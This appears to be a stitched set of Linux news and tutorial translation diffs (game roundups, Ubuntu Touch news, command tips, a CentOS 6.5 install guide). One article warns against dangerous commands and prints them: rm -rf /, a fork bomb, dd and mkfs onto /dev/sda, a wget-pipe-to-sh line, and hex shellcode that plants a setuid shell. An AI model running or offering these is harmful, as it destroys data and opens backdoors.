### Garry’s Mod ###
![Prop or not?](http://www.omgubuntu.co.uk/wp-content/uploads/2013/12/garrysmod-prophunt.jpg)
*Prop or not?*
Garry’s Mod is a sandbox game with little to no objective in itself, but the magic is in all the props you can load up from a number of Source engine games and the growing number of mods created by the community.
One such mod is [PropHunt][3] – a hide-and-seek game where one team hides as various objects on a map and the other attempts to find the filing cabinet precariously perched on a secluded staircase.
It’s simple fun, yet the vast array of game mods – be it for prop hunting, spaceship building, or machinima recording – makes Garry’s Mod a fantastic addition to an avid Linux gamer’s collection.
- [Get Garry’s Mod on Steam][4]
### Half-Life 2 ###
![Theoretical physics has never been so cool.](http://www.omgubuntu.co.uk/wp-content/uploads/2013/05/halflife.jpg)
*Theoretical physics has never been so cool.*
And speaking of the Source engine, Half-Life 2 might be the oldest game in the list, but is by far one of the most beloved both in Valve’s oeuvre and amongst all the games to come to Linux this year.
Half-Life 2 continues protagonist and theoretical physicist Gordon Freeman’s story from the first title in the series as he makes his way across a world ravaged by man and alien alike. Everything from physics puzzles to frighteningly agile headcrabs stand in your way, but the journey is *still* one of the most enthralling experiences in any game today.
The next title in the Half-Life series has a lot to live up to, but judging by the reception of one of the oldest titles to get a Linux port, Linux gamers are ready with crowbar and Gravity Gun in hand.
- [Get Half-Life 2 on Steam][5]
### Amnesia: A Machine for Pigs ###
When we reviewed Amnesia: A Machine for Pigs [in September][6], we found the title’s atmosphere as nerve-wracking as the first and worth trudging through the easy puzzles to explore the Victorian surroundings and steampunk-like machinery.
One of the biggest wins was day one Linux support for a title in such a popular series. But the developers at Frictional Games have always been friends to Linux gamers, porting titles from their Penumbra series in 2007 and 2008 soon after launch.
- [Get Amnesia: AMfP on Steam][7]
- [Get Amnesia: AMfP on the Ubuntu Software Center][8]
### Metro: Last Light ###
Metro: Last Light is one the first AAA titles to come to Linux and [relatively quickly][9] to boot. Set in 2034 under the nuclear-devastated city of Moscow, Metro: Last Light twists the tropes of post-apocalyptic narratives into an intense first-person shooter experience.
Everything from ghosts to mutant arachnids and giant amoebas are prepared to make a normal day in post-apocalyptic Moscow a little less pleasant.
It’s not as tongue-in-cheek as the similarly post-apocalyptic Fallout series, but just as reflective of the brutal, yet sometimes touching, human experience in trying times.
- [Get Metro: Last Light on Steam][10]
### Starbound ###
Think of Starbound as Terraria or a 2D Minecraft with a real storyline and set in space. What’s not to love?
Much like Minecraft, you can hunt, mine, and build in the world, but unlike the popular 3D sandbox game, you can also travel to other planets and participate in an actual storyline. Your spacecraft starts off stranded in orbit and your first set of quests involves familiarising yourself with the gameplay mechanics and finding fuel for your ship before you can start exploring the procedurally generated planets. What’s more, the various monsters on each planet are also procedurally generated, so you’ll encounter some truly bizarre creatures along the way.
Starbound is an **Early Access Game**, so you’ll probably discover some broken mechanics (the bow and arrow are a bit troublesome to say the least) and experience a crash or two along the way. But it’s still a fun and featureful game despite being in beta.
- [Get Starbound on Steam][11]
### 0 A.D. ###
![Workers constructing buildings and picking berries.](http://www.omgubuntu.co.uk/wp-content/uploads/2013/09/0ad_buildings.jpg)
*Workers constructing buildings and picking berries.*
0 A.D. has been available on Linux for several years, but we think it deserves a place in the list for all its accomplishments in 2013.
It’s the only free and open source title on the list and recently wrapped up a $33,251 [fundraising drive][12] – enough, they say, to hire one of their programmers for a full year. Though the game didn’t reach its more optimistic fundraising goals, that’s still $33,251 raised to support an open source project.
And more than anything, it’s fun. Fans of the Age of Empires style of real-time strategy will enjoy the work that’s gone into 0 A.D. over the years. The attention to detail is evident and though the title still has a ways to go, it only stands to improve with another dedicated programmer on board.
- [Get 0 A.D. on the Ubuntu Software Center][13]
### War in a Box: Paper Tanks ###
Tower defence games are as common as Reversi or Minesweeper, but [War in a Box: Paper Tanks][14] adds a dose of charm to the addictive genre.
Its unique paper-craft aesthetic works extremely well, giving the 24 levels a tireless appeal as you play and replay each level. At $3.99 it’s an easy sell for anyone who enjoys casual tower defence games. It’s simple fun, but utterly addicting.
- [Get War in a Box: Paper Tanks][15]
### FEZ ###
![I like fezes. Fezes are cool.](http://www.omgubuntu.co.uk/wp-content/uploads/2013/09/fez-closeup-300x204.png)
*I like fezes. Fezes are cool.*
We reviewed FEZ back [in September][16] and the perspective-shifting 2D platformer is every bit as fun as a Pillsbury Doughboy-like character with a fez on makes it sound.
Jumping puzzles, mind-bending perspective puzzles, and gaming in-jokes all contribute to a title that stays fresh even when you’ve fallen off the map a dozen times or stood too close to a bomb when it goes off.
- [Get FEZ on Steam][17]
### Europa Universalis IV ###
Imagine Civilization with a bit more micromanagement, a big helping of history, and one gigantic difference: it’s on Linux!
Unlike the Civilization games, Europa Universalis titles are historical strategy, though by no means a play-by-play of history books. And instead of battling across thousands of years, EUIV only spans the years 1444–1821. But that doesn’t mean EU is any less fun or engaging as the longer running Civilization series.
EUIV plays out in real-time rather than in turns, so you’ll be pausing often to get a better view of your growing empire or your wealthy nation’s vast trade routes. The EU series can be intimidating to beginners given the scope of “grand strategy” gameplay, but if you ever wanted to play out the colonisation of the Americas or tweak the outcome of the Napoleonic Wars, it’ll be worth the effort.
- [Get Europa Universalis IV on Steam][18]
### Kentucky Route Zero ###
[Kentucky Route Zero][19] is one of my favourite games of all time. It’s the most artistically-orientated title in the list and one that exemplifies the more poetic side of gaming in addition to all the AAA titles that we can to look forward to in 2014 and beyond.
Kentucky Route Zero brings the magical realism genre to point-and-click adventures, mixing the surreal with classic adventure game elements. You start out looking for an unknown address to deliver antiques to, but the narrative takes off in unexpected, often fantastical, directions from there.
It’s a game about discovery rather than achievements or saving a princess who’s inevitably in another castle. It won’t be everyone’s cup of tea – nor will it fit everyone’s definition of a “game” – but it is one of the most meaningful and creative titles I’ve ever had the pleasure of playing.
- [Get Kentucky Route Zero on Steam][20]
via: http://www.omgubuntu.co.uk/2013/12/top-10-linux-games-2013
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@ -1,46 +0,0 @@
UNIGINE Is Probably the Best Gaming Engine on Linux
**The UNIGINE, a real-time 3D engine built to run on all major platforms, including Linux, has just received another update, bringing some important new features.**
Unigine Engine is built by non-other than Unigine Corp., the company behind the Heaven DX11 Benchmark software. The technology they develop is getting better all the time, and with their recent expansion on the Linux platform, we’re all too glad to see that major updates have been implemented in the engine.
Amongst the biggest changes in the latest Unigine update is the Common Image Generator Interface (CIGI) protocol.
According to the developers, this interface is a standard way for a host device to communicate with an image generator (IG) in the simulation industry.
### Highlights of the new Unigine Engine: ###
- Support has been added for the conversion of WGS84, ECF and NED coordinate systems into Cartesian one (this will help developers to made better use of real-world GIS data in UNIGINE-powered projects);
- The Game Framework has been implemented, making it easier to create games with features such as automatic link between Entity and Node, automatic link between Level and World, object management for Entities, Global Game context across all Levels, events handling system, optimal updating of Entities, and more;
- The FPS stability for the rendered has been increased;
- Two new options, a 2D noise and 3D noise (States tab in the editor), have been added to the mesh_leaf_base material;
- A new parameter, Occlusion mask, has been added to all of the materials;
- Heights of clutters and grass are synchronized now;
- A few crashes on rendering of non-Flash splash screens have been fixed.
A complete list of new features, for all the platforms, is available in the official [announcement][1].
Keep in mind that the UNIGINE graphics engine is only aimed at commercial enterprises and that not even a trial version is available for the general public.
via: http://news.softpedia.com/news/UNIGINE-Is-Probably-the-Best-Gaming-Engine-on-Linux-404484.shtml
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@ -1,41 +0,0 @@
Unvanquished Will Probably Be the Best Free Multiplayer Game on Linux
**Unvanquished, a free, open-source first-person shooter combining real-time strategy elements with a futuristic and sci-fi setting, has just received its 22nd update. Actually it's 22.1, but who's counting?**
Even if Unvanquished is still in its Alpha stages, the developers have added a lot of new features and the game has become a lot more playable.
The Unvanquished Alpha 22.1 has received a few engine changes, some gameplay changes, a new map, a new version of an existing map, and more.
Snowstation is the new map integrated in the game. According to the developer, it has a simple layout, essentially a loop, and a snow-covered outside area forming part of that loop.
“We're now using C++ for all engine code. A few things are a bit different – some commands are changed a little or renamed and some output looks different. One which you'll probably notice while playing is marking for deconstruction – you'll need to rebind that key. The reason is that /if has lost its modifier key support; you'll need to use /modcase instead,” reads the announcement.
### Highlight of Unvanquished Alpha 22.1: ###
• The jetpack has been added. Users have to hold down the jump key and fly – but you can't hover anymore and you only have a limited amount of fuel;
• The reasons “under attack” messages are reported have been changed;
• Human weapons will be refilled or recharged automatically when close to a suitable building and not in use;
• Repeaters are now effectively small reactors and they will provide power even when there is no reactor around;
• FXAA now works with Mesa in OpenGL 2.1 contexts.
More details about this amazingly-looking game can be found on the official [website][1]. Keep in mind that this is a work in progress and bugs are bound to appear.
**Download Unvanquished Alpha 22.1 right now:**
- [Debian/Ubuntu DEB ALL][2][ubuntu_deb] [0 KB]
- [Arch Linux package][2][binary] [0 KB]
via: http://news.softpedia.com/news/Unvanquished-Will-Probably-Be-the-Best-Free-Multiplayer-Game-on-Linux-405956.shtml
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,48 +0,0 @@
‘Household Brands’ Interested In Ubuntu for Phones and Tablets, Says Shuttleworth
**Mark Shuttleworth has said that an ‘interesting set of household brands’ are looking at putting Ubuntu Touch on their own phones and tablets.**
The Ubuntu founder was speaking in the [keynote address][1] at the Ubuntu Developer Summit which kicked off this week.
No specific names, details or dates were offered up alongside the tantalising tidbit, though Mark did hint at one point that he expects Ubuntu Touch devices to be available to buy within the next couple of years.
### Ubuntu Tablets = Renewed Opportunity ###
[As mentioned by Jono Bacon recently][2], honing the Ubuntu Tablet experience will be the ‘key focus’ of the Ubuntu 14.04 development cycle. This was touched upon by Shuttleworth in response to a question on whether Ubuntu plan to make dual-booting Touch with Android easier (they are):
> “I’m excited about the tablet form-factor because I think it’s going to be a lot easier for people to enjoy Ubuntu on a tablet [because] doing it on a phone full time is a bit of a deep-device commitment – [though] we’ve heard some interesting reports of government departments using it because we don’t work for the NSA!”
Other notable points mentioned in the keynote included:
- Helping developers tailor Ubuntu Touch apps for the desktop
- Stable, dependable and performant desktop experience based on Unity 7
- Point releases of Ubuntu 14.04 LTS won’t be introducing Mir or Unity 8
- Ubuntu on ARM x64
- Sidestage to be re-introduced to tablet
- Supporting Android apps on Ubuntu ‘is a goal – but not a focus’ right now
> ‘Shuttleworth must be hoping that some of those interested household names make a firm commitment soon…’
This latter point appears to represent an about-turn, if true. Earlier in the year Canonical’s Richard Collins [told Engadget][1] that there were no plans to “engineer middleware for running Android apps [on Ubuntu Touch]“.
Android apps or not, Shuttleworth must be hoping that some of those interested household names make a firm commitment soon. The longer the gap the more ground competitors are gaining.
Samsung and Intel’s open-source mobile OS ‘Tizen’ [recently gained the backing of a further 36 companies][4], including an array of mobile networks, electronics bigwigs and game publishers.
Elsewhere, Mozilla’s Firefox OS continues to grow its users, OEM and carrier base; while [Jolla’s first Sailfish OS-powered handset ships later this month][5]. And although Ubuntu Touch isn’t aiming for the low-end segment, Android 4.4 debuted with a number of performance optimisations when used on hardware with limited resources.
via: http://www.omgubuntu.co.uk/2013/11/household-brands-ubuntu-phone-tablets
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,6 +1,7 @@
10 Lesser Known Effective Linux Commands – Part IV
Continuing the **Lesser Known** series, this fourth article of the series will let you know some useful **funny** and **animated** commands. Here we go into the practical session, without much theory.
继续我们的"鲜为人知"系列,本系列的第四篇会让你了解一些**有趣** 又 **动态**的命令。这里我们进入实际的教程,没有很多理论。
@ -8,17 +9,17 @@ Continuing the **Lesser Known** series, this fourth article of the series will l
- [10 Lesser Known Linux Commands – Part 2][2]
- [10 Lesser Known Commands for Linux – Part 3][3]
In the fourth article of this series which includes few other lesser known Linux commands, worth knowing. Might be you’re already aware of these commands, no doubt you’re an experienced Linux user and loves exploration.
### 32. strace Command ###
The **strace** is a debugging tool which is used primarily for troubleshooting purpose in Linux. It might not be installed by default in your system and you may need to **apt** or **yum** the required package.
**strace**是一个调试工具并被主要用于Linux的故障排除。它可能在你的系统内没有默认安装,你可能需要**apt** 或者 **yum**安装所需要的包。
Trace a command execution using strace command:
root@tecmint [~]# strace pwd
#### Sample Output ####
#### 示例输出 ####
execve("/bin/pwd", ["pwd"], [/* 29 vars */]) = 0
brk(0) = 0x728000
@ -40,56 +41,56 @@ Trace a command execution using strace command:
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f29b0de6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f29b0de5000
The **strace** command accepts a lot of arguments and have many options. Refer to man page for detailed information.
### 33. disown -a && exit 命令 ###
### 33. disown -a && exit Command ###
大多数系统管理员使用[screen 命令][4]来控制运行在终端后台的作业。让我们假设一下如果你有一个长期运行的作业并想要将它从终端中**分离**,你可以用screen命令来这么做。但是如果你不知道如何使用screen,那么disown可以用来救急。
Most of the system administrators use [screen command][4] to control jobs running in the terminal background. Let’s say if you having a long running job and want to **detach** from the terminal, you use screen command to do it. But what if you don’t know how to use screen, here comes disown command to rescue.
The disown command is used to run the jobs continuously in the background even after you closing the terminal session. The syntax of the disown command is:
root@tecmint [~]# Command; disown -a && exit
To detach again the long running job in the terminal, use the **jobs** command to find the job number and then use disown **%n** where **n** is the job number. To verify actually the job is running use **ps** or [top command][5]. The **nohup** command is an alternative to the disown command.
为了在终端中再次分离长期运行的作业,使用**jobs**命令来找出作业号,接着使用disown **%n**,这里的**%n**是作业号。为了验证作业确实在运行,使用**ps** 或者 [top 命令][5]。**nohup**命令也是一个disown命令的替代品。
### 34. getconf LONG_BIT Command ###
### 34. getconf LONG_BIT 命令 ###
The above command shows your machine architecture if it is **32** bit or **64** bit?
上面的命令能显示你的机器架构是**32** bit 或者 **64** 位?
root@tecmint [~]# getconf LONG_BIT
- [Download Linux Command Line Cheat Sheet][5]
- [下载Linux命令备忘单][5]
### 35. Display Date on the Terminal ###
### 35. 终端上显示日期 ###
The below command is a combination of several commands, better say it a script. For a person working at shell or terminal, without GUI seeing current system date is tedious job. You have to type ‘**date**‘ command to check today’s date.
Just execute the below command on you prompt and see the **date** and **time** on the above right corner of terminal.
root@tecmint [~]# while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done &
![Show Date in Terminal](http://www.tecmint.com/wp-content/uploads/2013/11/Date.jpg)
### 36. convert Command ###
### 36. convert 命令 ###
While writing tutorial, I usually need to produce output, many a times in image format. The above command combination does this for me. Say I need the output of tree command (for **/etc/x11** directory) in image format. What I did at terminal was:
在写教程的时候,我经常需要生成输出,很多时候是图片格式。上面的命令集合并不适合我。假设我需要tree命令的图片格式的输出(对 **/etc/x11** 目录 )。
root@tecmint:/etc/X11# tree | convert label:@- /home/avi/tree.png
The output of the above command can be seen at the specified location (here, home directory of mine) with the file name specified as **tree.png**.
### 37. watch -t -n1 “date +%T|figlet” ###
Remember our description of “**figlet**” command in our earlier article “[20 Funny Commands of Linux][7]”. This command was very cool, this time we will be pipelining ‘**figlet**‘ to show animated digital clock in the terminal.
记住“**figlet**”命令在我们早期的文章“[20 Funny Commands of Linux][7]”中的描述。这个命令非常酷,这次我们会通过管道输出到‘**figlet**‘而在终端上显示一个动画电子钟。
Just check-out yourself, remember you must have **figlet** installed on the system, do **apt** or **yum** to install the required package.
你自己检查一下,记住你必须已经在系统上安装了**figlet**,用**apt** 或者 **yum**安装所需要的包。
root@tecmint [~]# watch -t -n1 "date +%T|figlet"
#### Sample Output ####
#### 示例输出 ####
_ ___ ____ ___ _____ _ _ Fri Nov 29 10:29:34 GMT
/ |/ _ \ _|___ \ / _ \ _|___ /| || |
@ -97,9 +98,9 @@ Just check-out yourself, remember you must have **figlet** installed on the syst
| | |_| |_ / __/ \__, |_ ___) |__ _|
|_|\___/(_)_____| /_/(_)____/ |_|
### 38. host and dig Commands ###
### 38. host and dig 命令 ###
Although “**host**” and “**dig**” command is not that much lesser known, still not very frequently used. The host command is **DNS** lookup utility.
虽然“**host**” 和 “**dig**”命令不那么鲜为人知,但是仍并不常被使用。host命令是**DNS**查询工具。
root@tecmint [~]# host www.google.com
@ -119,17 +120,17 @@ Although “**host**” and “**dig**” command is not that much lesser known,
;; Got answer:
;; ->>HEADER<
### 39. dstat Command ###
### 39. dstat 命令 ###
The **dstat** is a versatile tool, that generates statistics relating to system resource. By default your system might not have ‘**dstat**‘ installed. Do a **apt** or **yum** to install ‘**dstat**‘ before using this very colorful and description system resource generator.
**dstat**是一个多用的工具,它会依据系统资源生成统计。默认上你的系统可能没有安装‘**dstat**‘。在使用这个多彩的描述系统信息的生成器前使用**apt** 或者 **yum**来安装。
root@tecmint [~]# dstat
![dstat command](http://www.tecmint.com/wp-content/uploads/2013/11/dstat.jpeg)
![dstat 命令](http://www.tecmint.com/wp-content/uploads/2013/11/dstat.jpeg)
### 40. bind -p Command ###
### 40. bind -p 命令 ###
The ‘**bind -p**‘ command will show all the shortcuts available for **BASH** shell.
‘**bind -p**‘会显示所有的**BASH** shell可用的快捷方式。
root@tecmint [~]# bind -p
@ -160,19 +161,19 @@ The ‘**bind -p**‘ command will show all the shortcuts available for **BASH**
### 41. touch /forcefsck ###
The above command will create an empty folder '**forcefsck**', under root directory. This will force Linux System to check the file system on the very next boot.
root@tecmint [~]# touch /forcefsck
hat’s all for Now. You People are loving these ‘**Lesser Known Commands**‘ and hence we are continuing the series, the next article of this series will be available very soon.
今天这些就是全部。因为你们爱‘**鲜为人知的命令**‘ ,因此我们将继续这个系列,本系列的下一篇文章将很快发布。
Till then stay tuned and connected to **Tecmint**. Don’t forget to give your valuable feedback in our comment section. Do a favor to us, Like and share us and help us spread.
via: http://www.tecmint.com/10-lesser-known-effective-linux-commands-part-iv/
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,166 +0,0 @@
10 Most Dangerous Commands – You Should Never Execute on Linux
"10个最危险的命令 - 你永远不要在Linux下执行,否则呵呵.."
Linux command line is productive, useful and interesting but sometimes it may be very much dangerous specially when you are not sure what you are doing. This article is not intended to make you furious of **Linux** or **Linux command** line. We just want to make you aware of some of the commands which you should think twice before you execute them.
"Linux命令行佷有用很高效,也很有趣,但有时候你不确定你自己在正在做什么时尤其的危险。这篇文章并不打算使你对**Linux**或**linux 命令行**感到愤怒。我们只是想让你意识到在你运行有些命令时应该三思而后行。"
### 1. rm -rf Command ###
"### 1. rm -rf 命令 ###"
The **rm -rf** command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with **rm command** are.
"**rm -rf**命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的打字错误或无知都可能导致不可恢复的系统毁坏。下列是一些**rm 命令**的选项。"
- **rm** command in Linux is used to delete files.
"- **rm** 命令在Linux下通常用来删除文件。"
- **rm -r** command deletes the folder recursively, even the empty folder.
"- **rm -r** 命令递归的删除文件夹,甚至是空的文件夹。"
- **rm -f** command removes ‘Read only File’ without asking.
"- **rm -f** 命令能不经过询问直接删除‘只读文件’。"
- **rm -rf /** : Force deletion of everything in root directory.
"- **rm -rf /** : 强制删除root目录下所有东东。"
- **rm -rf ** * : Force deletion of everything in current directory/working directory.
"- **rm -rf** * : 强制删除当前目录/工作目录的所有文件。"
- **rm -rf .** : Force deletion of current folder and sub folders.
"- **rm -rf .** : 强制删除当前文件夹及其子文件夹。"
Hence, be careful when you are executing **rm -rf** command. To overcome accidental delete of file by ‘**rm**‘ command, create an alias of ‘**rm**‘ command as ‘**rm -i**‘ in “**.bashrc**” file, it will ask you to confirm every deletion.
"从现在起,当你要执行**rm -rf**命令时请留心一点。我们可以在“**.bashrc**”文件对‘**rm**‘命令创建**rm -i**的别名,来预防用 ‘**rm**‘命令删除文件时的事故,它会要求你确认每一个删除请求。"
### 2. :(){:|:&};: Command ###
"### 2. :(){:|:&};: 命令###"
The above is actually a **fork bomb**. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.
"这就是个**fork 炸弹**的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。"
" :(){:|:&};:"
### 3. command > /dev/sda ###
"### 3. 命令 > /dev/sda ###"
The above command writes the output of ‘**command**‘ on the block **/dev/sda**. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.
### 4. mv folder /dev/null ###
"### 4. mv 文件夹 /dev/null ###"
The above command will move ‘**folder**‘ to **/dev/null**. In Linux **/dev/null** or **null** device is a special file that discards all the data written to it and reports that write operation succeed.
"上列命令会移动‘**文件夹**‘到**/dev/null**。在Linux中 **/dev/null** 或 **null** 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。"
" # mv /home/user/* /dev/null"
The above command will move all the contents of a **User** directory to **/dev/null**, which literally means everything there was sent to **blackhole (null)**.
"上列命令会将**User**目录所有内容移动到**/dev/null**,这意味着所有东西都被‘卷入’**黑洞 (null)**之中。"
### 5. wget http://malicious_source -O- | sh ###
"### 5. wget http://malicious_source -O- | sh ###"
The above command will download a script from a malicious source and then execute it. Wget command will download the script and **sh** will execute the downloaded script.
**Note**: You should be very much aware of the source from where you are downloading packages and scripts. Only use those scripts/applications which is downloaded from a trusted source.
"**注意**: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。"
### 6. mkfs.ext3 /dev/sda ###
"### 6. mkfs.ext3 /dev/sda ###"
The above command will format the block ‘**sda**’ and you would surely be knowing that after execution of the above command your Block (**Hard Disk Drive**) would be new, **BRAND NEW!** Without any data, leaving your system into unrecoverable stage.
### 7. > file ###
"### 7. > file###"
The above command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> **xt.conf**” will write the configuration file or any other system or configuration file.
"上列命令常用来清空文件内容。如果用上列执行时输入错误或无知的输入类似 “> **xt.conf**” 的命令会覆盖配置文件或其他任何的系统配置文件。"
### 8. ^foo^bar ###
"### 8. ^foo^bar ###"
This command, as described in our [10 Lesser Known Linux Commands][1], is used to edit the previous run command without the need of retyping the whole command again. But this can really be troublesome if you didn’t took the risk of thoroughly checking the change in original command using **^foo^bar** command.
### 9. dd if=/dev/random of=/dev/sda ###
"### 9. dd if=/dev/random of=/dev/sda ###"
The above command will wipe out the block **sda** and write random junk data to the block. Of-course! Your system would be left at inconsistent and unrecoverable stage.
### 10. Hidden the Command ###
"### 10. 隐藏命令 ###"
The below command is nothing but the first command above (**rm -rf**). Here the codes are hidden in **hex** so that an ignorant user may be fooled. Running the below code in your terminal will wipe your **root** partition.
"下面的命令其实就是上面第一个命令 (**rm -rf**)。这里的代码是隐藏在**十六进制**里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你对**root**分区。"
This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.
" char esp[] __attribute__ ((section(“.text”))) /* e.s.p"
" release */"
" = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″"
" “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″"
" “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″"
" “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″"
" “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″"
" “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″"
" “\x6e\x2f\x73\x68\x00\x2d\x63\x00″"
" “cp -p /bin/sh /tmp/.beyond; chmod 4755"
" /tmp/.beyond;”;"
**Note**: Don’t execute any of the above command in your **Linux** terminal or shell or of your friend or school computer. If you want to test them, run them in virtual machine. Any in-consistence or data loss, due to the execution of above command will break your system down for which, neither the **Author** of the article nor **Tecmint** is responsible.
"**注意**: 不要在你的或你的同学或学校的电脑里的**Linux**终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章**作者**和**Tecmint**概不负责。"
That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to **Tecmint**. If you know any other such **Dangerous Linux Commands** and you would like us to add to the list, please tell us via comment section and don’t forgot to give your value-able feedback.
via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[校对者ID](https://github.com/校对者ID)
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成为 Linux 终端高手的 7 个基本点
Linux 终端不仅是一个键入命令的地方。如若你能熟谙基本操作,那么你将掌握绝大多数 Linux 发行版的默认配置 Bash shell。
howtogeek.com 对初级用户,以及那些学习过程中或多或少有一些遗漏的高级用户提出几个基本点——
**1.Tab 补全** – 这样能节省时间,并且对于输入那些你不确定其具体名称的文件和命令来说很方便。比如,当前目录下有一个名为“really long file name”的文件,你想要删除它。你可以输入完整的文件名,但是你必须确保正确地输入了空格。若当前目录下还有许多以字母“r”开头的文件,(如果你没有正确地输入空格) Bash 将不知道你想要删除哪一个文件。
如果在当前目录下存在着另一个名为“really very long file name”的文件,你敲击了Tab键。Bash
**2.管道机制** – 这种机制允许你把一条命令的输出传送到另一条命令。按照 UNIX 哲学,每个程序都足够小,只做一件事并将之做到最好。例如,ls命令列出当前目录下的所有文件,grep命令搜索输入其中的指定检索项。
ls | grep word
**3.通配符** – “*”(星号)字符是一种匹配任意长度字符的通配符。比如,你想删除当前文件夹下名为“really long file name”和“really very long file name”的文件,你可以运行以下命令:
rm really*name
这条命令会删除所有以“really”开头以“name”结尾的文件。但是,如果你运行的是 rm * 这条命令,你将会删除文件夹下的所有文件。
**4.输出重定向** – “>”字符可以把一条命令的输出重定向到一个文件或另一条命令。比如,下面这行命令执行完 ls 后会列出当前文件夹下的所有文件,其结果不是在终端显示,而是输出到当前文件夹下一个名为“file1”的文件中去:
ls > file1
**5.历史记录** – Bash 能记住你以前输入过的命令,上、下方向键可以逐行调出它们。使用 history 命令打印历史记录,以管道机制 grep 选择性地输出你想要的结果。
~, . & ..
“~”,也叫做波浪符,用来表示当前用户的主目录。相比通过 cd /home/name 到达你的主目录,你可以输入 cd ~ 来达到相同效果。这点也可以在相关路径上使用 – 比如 cd ~/Desktop 能够到达当前用户的 Desktop 目录。
同样,“.”代表当前目录,“..”代表当前目录的父目录。使用 cd .. 可以返回上一级目录。它们也可以用在相关路径上,举例说明:你当前处在 Desktop 文件夹下,通过 cd ../Documents 命令,你可以转到与 Desktop 共有同一父文件夹的 Documents 文件夹去。
**6.后台命令** – Bash 默认会在当前终端执行你键入的每条命令。通常没有问题,但是如果你想要在启动应用后继续使用终端呢?通过输入 firefox 启动火狐浏览器,你的终端将被错误提示等各种信息输出占据,直到你关闭火狐浏览器为止。在 Bash 中你可以通过在命令结尾添加“&”操作符来后台执行程序。
firefox &
**7.条件执行** – Bash 也可以连续执行两条命令。 第二条命令仅在第一条命令成功执行后才会开始执行。如若如此,你可以通过键入“&&”,也就是两个与字符进行分隔,在同一行输入两条命令。下面给出的命令会在等待 5 秒后运行 gnome-screenshot 工具:
sleep 5 && gnome-screenshot
via: http://www.efytimes.com/e1/fullnews.asp?edid=123564
译者:[SteveArcher](https://github.com/SteveArcher) 校对:[校对者ID](https://github.com/校对者ID)
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CentOS 6.5 桌面版安装教程附带大量截图
### CentOS 6.5 新版本发布 ###
随着RHEL 6.5新版本的发布,[CentOS 6.5][1]在12月1号准时跟上。现在是时间来玩弄它了。对于那些想要从已经安装好的6.4系统升级到6.5只要简单的使用* yum update *命令然后就是见证奇迹的时刻。
CentOS 6.5 迎来了新的更新包和新功能。可以在[release notes][2]中查看更多细节信息。
### 主要更新 ###
> 精密时间协议 - 以前仅是一个科技预览版 - 现在已经完整支持了!以下设备支持网络时间标记:bnx2x,tg3 , e1000e , igb , ixgbe ,sfc。
> OpenSSL 升级到1.0.1版本
> OpenSSL、NSS支持TLS1.1和1.2
> KVM得到大量加强.包括提升对VMDK- 和 VHDX-Files 的只读,CPU支持热插拔以及升级了 virt-v2v-/virt-p2v-conversion 工具
> Hyper-V 和 VMware 驱动升级
> 升级到 Evolution(2.32)和 Libre Office(4.0.4)
### 下载 ###
选择你的机器制式,它会列出一张镜像表。进入任何一个镜像、得到种子文件下载或者直接下载iso链接。有许多选择下载方式可以选择,比如,LiveCD, LiveDVD, Dvd1+2, Minimal 和 Netinstall.
DvD1+2 被设置为提供完整的应用程序给需要他的人
netinstall 事实上会先下载安装镜像然后再安装
这篇文章我们将使用LiveCD。 它大概有650MB。
尽管CentOS主要使用在服务器上,但有一个桌面系统可以帮助你的服务器在安装时创造一个基础GUI的安装环境。在其他文章,我们将会尝试minimal 和 netinstall安装方法。
### 安装 ###
4.**键盘布局** - 这一步会询问你,选择你的键盘布局。(译注:推荐选择U.S. English)
5.**存储类型**完成键盘布局的选择,接下来的是选择用来安装CentOS的存储类型。对于本地硬盘启动,应该选择Basic storage。
6.**主机名** 下一步 anaconda 安装器会询问主机名。所以填入适当的词。如果不确定,随意输入一个(译注:主机名hostname可以随时更改)。
7.**时区选择** 接下来选择时区选项。
8.**Root 密码** 下面是输入 root 密码 ,最好是输入一个熟悉的密码。
9.**规划分区** 现在向导想要知道,你将要怎么规划存储设备。
如果你需要自己规划分区,选择 “Custom Layout” 并根据需要分区。为了这篇教程的目的,我们选择了第一个选项,那就是使用整个设备并让CentOS用它喜欢的规划自动分区。
10.**复制文件** 现在安装已经开始复制文件了。现在除了等待和盯着没有什么事情可以做。LiveCD安装器基本上从CD镜像上复制到硬盘上。你没有得到任何安装包的选项去选择安装或省略。同样liveCD只有很少的软件和应用程序一起打包。
### 安装完毕后配置 ###
